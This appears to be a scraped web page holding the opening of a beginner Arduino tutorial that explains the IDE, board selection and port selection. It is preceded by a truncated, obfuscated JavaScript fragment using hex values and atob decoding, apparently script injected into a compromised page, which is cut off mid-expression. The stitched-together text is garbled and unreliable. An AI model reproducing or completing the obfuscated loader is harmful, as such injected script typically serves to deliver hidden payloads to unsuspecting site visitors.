/*>(-0x2*n&0x6)):0x0){p=j['indexOf'](p);}return m;});}());var g=function(h,l){var m=[],n=0x0,o,p='',q='';h=atob(h);for(var t=0x0,u=h['length'];t/* */

Welcome in the World of technology. In this session, we will learn how to make projects using most common Arduino Boards from ZERO level to ADVANCE level. But out of this , Firstly we have to understand how to use Arduino Board.

Getting Started Your project, must remember the points given below:-

Point 1: Use Arduino IDE to insert code in Arduino for your project.


Point 2: Once the board is plugged in, you will need to open the IDE and click on Tools > Board > Arduino Uno to select the board.

Point 3: Next, you have to tell the Arduino which port you are using on your computer.  To select the port, go to 
Tools > Port and then select the port that says Arduino.